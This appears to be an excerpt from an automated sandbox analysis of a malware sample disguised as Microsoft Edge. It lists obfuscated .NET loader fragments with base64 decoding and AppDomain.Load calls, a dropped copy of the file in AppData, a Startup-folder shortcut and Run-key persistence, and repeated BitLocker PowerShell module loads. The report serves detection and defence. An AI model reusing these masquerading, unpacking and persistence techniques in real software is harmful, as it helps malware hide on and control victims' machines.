              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT._4KoARYDOQ9VLM9kYHmUXl0TIJBVcAWwhHQdPzVFF1TirE6JwTOjUgxh,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.XwxR3w92hYWm3OtktjYAuUUzmFlAiK5p8XJH8o6Jkmx1Y7nQbUBOXEn,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.AvVErL5jnNbxMgQcKtQFsqwhSA73cplEUkr4Blkx5g6tLn7fLySkDYO,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.IpSuxM8rkOLKDWfFCbXiilUMMAq9XhLI84dFOAZdBteOceY3PqmXAEu,_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.Q5p04PRAB7LBBAAaZF0O16kjvtWGEN0Dw2pSJhBMl2N3H8t27ao4xHjSwF8wWyGjYu5BjToEY()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[2],_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.eRcJhU85fgETQetokKo0O7H8LsfE25GNLLREJszbxkDRDwyfsy1Bwoqp5kMGguoIGTTFDPQTv(Convert.FromBase64String(S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg System.AppDomain.Load(byte[])
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp System.AppDomain.Load(byte[])
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg System.AppDomain.Load(byte[])
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp System.AppDomain.Load(byte[])
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp
              Source: C:\Users\user\Desktop\msedge_visual_render.exeCode function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DFD2A5 pushad ; iretd 2_2_00007FF848DFD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F109B8 push E95ABCD0h; ret 2_2_00007FF848F109C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F109E8 push E85D925Dh; ret 2_2_00007FF848F109F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE2316 push 8B485F94h; iretd 2_2_00007FF848FE231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E1D2A5 pushad ; iretd 5_2_00007FF848E1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F319DB pushad ; ret 5_2_00007FF848F319E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F300BD pushad ; iretd 5_2_00007FF848F300C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF849002316 push 8B485F92h; iretd 5_2_00007FF84900231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E2D2A5 pushad ; iretd 8_2_00007FF848E2D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F400BD pushad ; iretd 8_2_00007FF848F400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF849012316 push 8B485F91h; iretd 8_2_00007FF84901231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848E1D2A5 pushad ; iretd 10_2_00007FF848E1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F300BD pushad ; iretd 10_2_00007FF848F300C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF849002316 push 8B485F92h; iretd 10_2_00007FF84900231B
              Source: C:\Users\user\AppData\Roaming\msedge.exeCode function: 13_2_00007FF848F100BD pushad ; iretd 13_2_00007FF848F100C1
              Source: C:\Users\user\AppData\Roaming\msedge.exeCode function: 14_2_00007FF848F300BD pushad ; iretd 14_2_00007FF848F300C1
              Source: msedge_visual_render.exe, XS8m6YBpCDtRV9a.csHigh entropy of concatenated method names: 'QORk6FeTXwZ9716', 'wN9NyIKsmyfBfUy', '_8QBfeg8ryVGnesb', 'DDbKNkiqqqgWA78u7Vr3V458lG62TgyZV', 'kX5MFny8vZbMX0xWiZrT1Nv1OhaCLiPIT', '_0cKrkfebjff0OGygOSToekxy8Ca0QpY9w', '_8uAi1bwPbkQNQdZaZFMB0j1wzWOqMYTHe', 'nbnsVMrCpaXWBnfHnHT51epF54lGjI4Gx', 'pQCo9HEfcOShncVCZHqBX3OTImpLYXlxS', 'y5cHyYugrPJExYOKojLsRczoNGZW5kZmM'
              Source: msedge_visual_render.exe, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.csHigh entropy of concatenated method names: 'ryHT6xzaSnQFmjDvK1GBISkpIY6IhsC2rRI5dOBqEp0JbSrvSZfhXuV64WPB8Iv7j0l0PNGGT', 'uX7nZbyYDybTmHCqbeGGxERl9YNqlqkit', '_1Ow4dhVcewJoUuI5za4KqQKK5Q6ATpybt', '_8OuzLCVmLJRJlYZh5pUeJn6SQKdKfopGc', 'ADrRLKgeIOjheVBkdt4xfO0tE8DgbT2iI'
              Source: msedge_visual_render.exe, elLkHgumj8zMt6dU8JYf1G6IkwDQivZKUFJjfEVDTWpzx37RFuDS3IKMnbII5ilgpL3mjMM2z20DN5pmWdXDGhgB.csHigh entropy of concatenated method names: 'RNr9A1bT8ZRsrKuCiQHPtnOjL0JarLxTw9MISlOHVuSNi7HHtmuMXt8AXPkwEvecougipcLkLjSv53YZlFG0v8wC', 'vIBC9uIrXh1zc5tmvzVebHpPs4lje2CS7', 'FWiY4Lgjmoxo2EW46N97O5P336VrGVb8b', '_35U3Qh5uQpf9cK3VJ8RxX3jBBC6FLhX29', 'UbLaffdcJC6J7jxJPnuLblqYEHVAReTNB'
              Source: msedge_visual_render.exe, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.csHigh entropy of concatenated method names: '_6IJeoj42CcbPMqQtejRCcNKqlJHi46D1EilEgnIXenRrhSZ0N1FbgAr', 'OviqWHBSPGVvs7wdErJr5aJfG9gMoZdKOdvop6aS7ua0SLwN84o1Exq', 'OGKY6H43n9Lp6ntUDx8X43MQZzhcCrR3qLByvD1PEJR0LuBkr38UqIQ', 'bZHPA2qZ242r2miJv88K76GVJKAt7eqUVWjso8eRPzuPUgyVzJxMR46', 'gPGWuRrm6E8zexZzCf9DKB5vdMtY4dB8sy4LDlYehV3LxYysATmajM5', 'JPue3vPYV69oIqXy4tBgk26K2UfvumhcVhzySdj9drDSjR2QAXrOHH2', 'h4BqWId2Pf8ePwPczkCi9zyYrthp2RRilHFzNyYeVWfB1dKuxHw1R2o', 'XuOQNrjXQavI1sJYkomP7XHjR3AcQOWbdaTOhfvXOCDvFPES1VIKYPS', 'h7O8rpmtQZZUXff5Ms5GfBzHUzGgGYPIh6yrWzYzhaqh2fPIw8wvtMd', '_5wAT4n3FXgmUwJtqVo2pfiJbZyqizdsjmKXjD3cDlpNFSuJRNaeKQzM'
              Source: msedge_visual_render.exe, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.csHigh entropy of concatenated method names: '_0lWdbUJQ6MglkepIJPo1igjSuT8XUrwQAD8dJkIkUGj5jPYatYC3YqkOE3tJaeFmovQTNThOR', 'VvV5YPwAnq9i2w7pyR7Pl01qwbKo0dmhbCoY8HdU77TT7QfPZWz4FFztIcNn4BClcJmVHIlKF', 'NZSQwCK1G4YRGL4iJWhzxpyTjve62ni7hmeW563hTvwekCYooJzFvfAcj34N72sStwINJI0tT', 'wHXdyFElOwljVWE0iGf0RhRjSl3MQJqbQkOuGPEd6D95u0uXbGjZfZrF6LF9or1LICFlRux76', 'gM52mAwgmBEExAWHKJXFiyEOB4ObDUYvgsOqcfNFmnfxCUjK3RfRD0y8A3r5xmzxQN8i8s8I5', '_4abJqWhsmdNe2iOLeVeCHc94UCz6CA5JeGMfMzUtyDoA0lr4voXJOdZsPktwXcWXNWGDG9ddk', 'Lum1wvVRcUcJbhuJp7gWv6DsLTtr3HztccQgCN7WbBrMcMN9huRjnd50zetQhOxnU8RP78yRK', 'kktFoQYwvGGqMZCH4sBISRADyLZhkRzphm2g3A0ou0gbb1UwRmBnZhwLvM0BKzjVtItPL7S2a', '_7yOzgXxQE7D9An5amaYVO2ik1ocVGy2UFXIhWcH2d7S5D98ET1FHmyUYjAnNM9dZ2SbjCeUfT', 'Be82WIappoOQbTIAX4EXRAYIvI5i7Y6kBBpJxUVmoeZHFW884hAMj6T6VnRhRQNU9FPznq08j'
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.csHigh entropy of concatenated method names: 'BCCnncdvmVX47gZzxP8w0x9Y9P3btDxMr5xSPrmNPVJkYlZCXi7ePWocB5bH2hLDdd73PzEQlVkJsEfxGuFlSuoF', 'cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg', 'BiLxYcuMcoz8dx5bJmCogyHdNwQL3jQi1Xp9o7zZUFBOmRtbzRLKBy9gKfRSPVIyqTezkmGnBv532YqcvWnLlCCx', 'R7r4nq35gOBFXVYXTskbl8p76O1VpQVYx8lNTJ8NAiHrVvB918oA3sfYL1QzLev0DIc9nIbsv5GFKfu5XNjNOYRt', '_5xbN9z6Km7cH7SmA2CvyYIa407kly6mXxfA6PEhTRvBbb6XfnDOzth10LGXoYILIjFNwPo4iBDJgfIrl2ib8BFOq', 'DDDScvAymfUhNMJZFBKJjv1bfcNkDjlgzS36WrJT7AmDIJTCvYvQchHpd4HKuOdGwTGZNzko6uk05Xcbftw6Uzpu', 'kvdG3gowgiKcdpj3EbxJtWNbk7oAdTFqco5lZhXSp0BTuPVseceAEEh2dmiXTJmMbFDKlyhV4e5ZGgLLk1nepFEu', 'nDfRvOB9IJ6eM4U9FaVEwa7zb3Mu9dUxuaRDacwRCm3fzATJu2epc8ox0enZbSfvM7OVxnVsrNWDrwQqrjAmJLue', '_8jPApqv3fRmMqj9UhkELlHhWawKuQnxQUJigZa7k3tq1r8gxXm8fHQkwFsDo1kmizbobCjyuHCXMYqMDtdrp0b1f', 'Oae67RW5zNjkwJk4zz0HqDABs5R0W0pedT3Ntheid3zBHb25hyF2IjDtGk6THWH1VRs82fGyoyPa7xHij5dFSl3R'
              Source: msedge_visual_render.exe, LppdMUzjYTZSer81jQFRniukvyXOkU8JBTx5lIvFRSb0NWWPM2a9flL.csHigh entropy of concatenated method names: 'PpyKkExu10BwO6sBYJLo5oom2zvFMGCJhuEJMPDDzOxIOnJbwAxjpGB', '_86yImf4Ml9VIXlfFwnJAeQAXxmXlKIwXbrPCUk8I5VxV1VWkbAMmwjx', '_0BaOKmQ80p0DRdABpNfDbm5SUoF3Dppa0OP2NuHnUanu1Apagm9OqLw', 'LX5yXb09v3Jv1ahFy07ftzcRFQcVyQhmF23aF9ZLcRSOqOaXcQGxcHU', 'mHndYDhqBfehwpe', 'r6ZinNvwh0BZuwQ2TCdUufdP1ewaNpWJtXGRj9xsaZz9jQGt', 'nY8QQmsCmYEDjs2adun1QT4rP6zjXlkijr5LTUUxMyINPHUr', 'AYh2ryE7BjbV7KpmdNJOuNXhuCmiK950PAGQxPtnNZ8WxbHt', 'EsS7bPMXuxh0pqpINdoOWvE9ypoM4SaRExmVFnhhFTelPugp', 'p4fU8Af3S3ugu6AOV3p4ScfAxDJ4JSyfvlZTJdRGbwO0rrYd'
              Source: msedge_visual_render.exe, TxKfvxZAkfcU37RTEH4kQoKfGaF9jpeLtGmpJ8JcbPiR5ZbdkrM4z96BzFxl8usuwMFLkv3XU.csHigh entropy of concatenated method names: 'SJchA07n93Re2S8jfRZtYcMWEhHVRB2V74anStBqOT37oDL1cgwcUAcZI1mPL2vcLDOu60Twg', '_8U6oFig8dpHDZh8XT4Evg3qeWDvxFFNmtBZHDdtTUPLMoXpjT1St0g4Io4qJj6hQYDMOC3FdC', 'nGw8KGcs0mwpxtpSjOnak5rU9DecElCDMXhYhYS15lIgKO2FXp2cJa7X14tJHNe40X8tBe58r', 'ehPloLi8Rt4aLlq7Klh5ZgfQOkp8UQBp9CMc9E4Unoo5vd3mfzELwy4Ok5gAXgEEAyjEvK3eW', 'OAHwHlBQqXZhzF271Ynq9h46neAH0cOPW', '_5djsbM1Qbpm4USL9iAq2k9gfkpmK2pXbN', 'UVLuAbgKcp3wJRmNVFxLZ9rDJQ2UmYdY4', '_76b3OVkOyyN6L2UVOv1EzuThJi0X6SD3z', 'GzOoSx78EzMrmHn2CoSZYXpA0L46XKUd5', 'ef96gJB6ZOTNTsOulT9lxWil68FXbcLUI'
              Source: msedge.exe.0.dr, XS8m6YBpCDtRV9a.csHigh entropy of concatenated method names: 'QORk6FeTXwZ9716', 'wN9NyIKsmyfBfUy', '_8QBfeg8ryVGnesb', 'DDbKNkiqqqgWA78u7Vr3V458lG62TgyZV', 'kX5MFny8vZbMX0xWiZrT1Nv1OhaCLiPIT', '_0cKrkfebjff0OGygOSToekxy8Ca0QpY9w', '_8uAi1bwPbkQNQdZaZFMB0j1wzWOqMYTHe', 'nbnsVMrCpaXWBnfHnHT51epF54lGjI4Gx', 'pQCo9HEfcOShncVCZHqBX3OTImpLYXlxS', 'y5cHyYugrPJExYOKojLsRczoNGZW5kZmM'
              Source: msedge.exe.0.dr, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.csHigh entropy of concatenated method names: 'ryHT6xzaSnQFmjDvK1GBISkpIY6IhsC2rRI5dOBqEp0JbSrvSZfhXuV64WPB8Iv7j0l0PNGGT', 'uX7nZbyYDybTmHCqbeGGxERl9YNqlqkit', '_1Ow4dhVcewJoUuI5za4KqQKK5Q6ATpybt', '_8OuzLCVmLJRJlYZh5pUeJn6SQKdKfopGc', 'ADrRLKgeIOjheVBkdt4xfO0tE8DgbT2iI'
              Source: msedge.exe.0.dr, elLkHgumj8zMt6dU8JYf1G6IkwDQivZKUFJjfEVDTWpzx37RFuDS3IKMnbII5ilgpL3mjMM2z20DN5pmWdXDGhgB.csHigh entropy of concatenated method names: 'RNr9A1bT8ZRsrKuCiQHPtnOjL0JarLxTw9MISlOHVuSNi7HHtmuMXt8AXPkwEvecougipcLkLjSv53YZlFG0v8wC', 'vIBC9uIrXh1zc5tmvzVebHpPs4lje2CS7', 'FWiY4Lgjmoxo2EW46N97O5P336VrGVb8b', '_35U3Qh5uQpf9cK3VJ8RxX3jBBC6FLhX29', 'UbLaffdcJC6J7jxJPnuLblqYEHVAReTNB'
              Source: msedge.exe.0.dr, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.csHigh entropy of concatenated method names: '_6IJeoj42CcbPMqQtejRCcNKqlJHi46D1EilEgnIXenRrhSZ0N1FbgAr', 'OviqWHBSPGVvs7wdErJr5aJfG9gMoZdKOdvop6aS7ua0SLwN84o1Exq', 'OGKY6H43n9Lp6ntUDx8X43MQZzhcCrR3qLByvD1PEJR0LuBkr38UqIQ', 'bZHPA2qZ242r2miJv88K76GVJKAt7eqUVWjso8eRPzuPUgyVzJxMR46', 'gPGWuRrm6E8zexZzCf9DKB5vdMtY4dB8sy4LDlYehV3LxYysATmajM5', 'JPue3vPYV69oIqXy4tBgk26K2UfvumhcVhzySdj9drDSjR2QAXrOHH2', 'h4BqWId2Pf8ePwPczkCi9zyYrthp2RRilHFzNyYeVWfB1dKuxHw1R2o', 'XuOQNrjXQavI1sJYkomP7XHjR3AcQOWbdaTOhfvXOCDvFPES1VIKYPS', 'h7O8rpmtQZZUXff5Ms5GfBzHUzGgGYPIh6yrWzYzhaqh2fPIw8wvtMd', '_5wAT4n3FXgmUwJtqVo2pfiJbZyqizdsjmKXjD3cDlpNFSuJRNaeKQzM'
              Source: msedge.exe.0.dr, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.csHigh entropy of concatenated method names: '_0lWdbUJQ6MglkepIJPo1igjSuT8XUrwQAD8dJkIkUGj5jPYatYC3YqkOE3tJaeFmovQTNThOR', 'VvV5YPwAnq9i2w7pyR7Pl01qwbKo0dmhbCoY8HdU77TT7QfPZWz4FFztIcNn4BClcJmVHIlKF', 'NZSQwCK1G4YRGL4iJWhzxpyTjve62ni7hmeW563hTvwekCYooJzFvfAcj34N72sStwINJI0tT', 'wHXdyFElOwljVWE0iGf0RhRjSl3MQJqbQkOuGPEd6D95u0uXbGjZfZrF6LF9or1LICFlRux76', 'gM52mAwgmBEExAWHKJXFiyEOB4ObDUYvgsOqcfNFmnfxCUjK3RfRD0y8A3r5xmzxQN8i8s8I5', '_4abJqWhsmdNe2iOLeVeCHc94UCz6CA5JeGMfMzUtyDoA0lr4voXJOdZsPktwXcWXNWGDG9ddk', 'Lum1wvVRcUcJbhuJp7gWv6DsLTtr3HztccQgCN7WbBrMcMN9huRjnd50zetQhOxnU8RP78yRK', 'kktFoQYwvGGqMZCH4sBISRADyLZhkRzphm2g3A0ou0gbb1UwRmBnZhwLvM0BKzjVtItPL7S2a', '_7yOzgXxQE7D9An5amaYVO2ik1ocVGy2UFXIhWcH2d7S5D98ET1FHmyUYjAnNM9dZ2SbjCeUfT', 'Be82WIappoOQbTIAX4EXRAYIvI5i7Y6kBBpJxUVmoeZHFW884hAMj6T6VnRhRQNU9FPznq08j'
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.csHigh entropy of concatenated method names: 'BCCnncdvmVX47gZzxP8w0x9Y9P3btDxMr5xSPrmNPVJkYlZCXi7ePWocB5bH2hLDdd73PzEQlVkJsEfxGuFlSuoF', 'cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg', 'BiLxYcuMcoz8dx5bJmCogyHdNwQL3jQi1Xp9o7zZUFBOmRtbzRLKBy9gKfRSPVIyqTezkmGnBv532YqcvWnLlCCx', 'R7r4nq35gOBFXVYXTskbl8p76O1VpQVYx8lNTJ8NAiHrVvB918oA3sfYL1QzLev0DIc9nIbsv5GFKfu5XNjNOYRt', '_5xbN9z6Km7cH7SmA2CvyYIa407kly6mXxfA6PEhTRvBbb6XfnDOzth10LGXoYILIjFNwPo4iBDJgfIrl2ib8BFOq', 'DDDScvAymfUhNMJZFBKJjv1bfcNkDjlgzS36WrJT7AmDIJTCvYvQchHpd4HKuOdGwTGZNzko6uk05Xcbftw6Uzpu', 'kvdG3gowgiKcdpj3EbxJtWNbk7oAdTFqco5lZhXSp0BTuPVseceAEEh2dmiXTJmMbFDKlyhV4e5ZGgLLk1nepFEu', 'nDfRvOB9IJ6eM4U9FaVEwa7zb3Mu9dUxuaRDacwRCm3fzATJu2epc8ox0enZbSfvM7OVxnVsrNWDrwQqrjAmJLue', '_8jPApqv3fRmMqj9UhkELlHhWawKuQnxQUJigZa7k3tq1r8gxXm8fHQkwFsDo1kmizbobCjyuHCXMYqMDtdrp0b1f', 'Oae67RW5zNjkwJk4zz0HqDABs5R0W0pedT3Ntheid3zBHb25hyF2IjDtGk6THWH1VRs82fGyoyPa7xHij5dFSl3R'
              Source: msedge.exe.0.dr, LppdMUzjYTZSer81jQFRniukvyXOkU8JBTx5lIvFRSb0NWWPM2a9flL.csHigh entropy of concatenated method names: 'PpyKkExu10BwO6sBYJLo5oom2zvFMGCJhuEJMPDDzOxIOnJbwAxjpGB', '_86yImf4Ml9VIXlfFwnJAeQAXxmXlKIwXbrPCUk8I5VxV1VWkbAMmwjx', '_0BaOKmQ80p0DRdABpNfDbm5SUoF3Dppa0OP2NuHnUanu1Apagm9OqLw', 'LX5yXb09v3Jv1ahFy07ftzcRFQcVyQhmF23aF9ZLcRSOqOaXcQGxcHU', 'mHndYDhqBfehwpe', 'r6ZinNvwh0BZuwQ2TCdUufdP1ewaNpWJtXGRj9xsaZz9jQGt', 'nY8QQmsCmYEDjs2adun1QT4rP6zjXlkijr5LTUUxMyINPHUr', 'AYh2ryE7BjbV7KpmdNJOuNXhuCmiK950PAGQxPtnNZ8WxbHt', 'EsS7bPMXuxh0pqpINdoOWvE9ypoM4SaRExmVFnhhFTelPugp', 'p4fU8Af3S3ugu6AOV3p4ScfAxDJ4JSyfvlZTJdRGbwO0rrYd'
              Source: msedge.exe.0.dr, TxKfvxZAkfcU37RTEH4kQoKfGaF9jpeLtGmpJ8JcbPiR5ZbdkrM4z96BzFxl8usuwMFLkv3XU.csHigh entropy of concatenated method names: 'SJchA07n93Re2S8jfRZtYcMWEhHVRB2V74anStBqOT37oDL1cgwcUAcZI1mPL2vcLDOu60Twg', '_8U6oFig8dpHDZh8XT4Evg3qeWDvxFFNmtBZHDdtTUPLMoXpjT1St0g4Io4qJj6hQYDMOC3FdC', 'nGw8KGcs0mwpxtpSjOnak5rU9DecElCDMXhYhYS15lIgKO2FXp2cJa7X14tJHNe40X8tBe58r', 'ehPloLi8Rt4aLlq7Klh5ZgfQOkp8UQBp9CMc9E4Unoo5vd3mfzELwy4Ok5gAXgEEAyjEvK3eW', 'OAHwHlBQqXZhzF271Ynq9h46neAH0cOPW', '_5djsbM1Qbpm4USL9iAq2k9gfkpmK2pXbN', 'UVLuAbgKcp3wJRmNVFxLZ9rDJQ2UmYdY4', '_76b3OVkOyyN6L2UVOv1EzuThJi0X6SD3z', 'GzOoSx78EzMrmHn2CoSZYXpA0L46XKUd5', 'ef96gJB6ZOTNTsOulT9lxWil68FXbcLUI'
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile created: C:\Users\user\AppData\Roaming\msedge.exeJump to dropped file
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnkJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnkJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
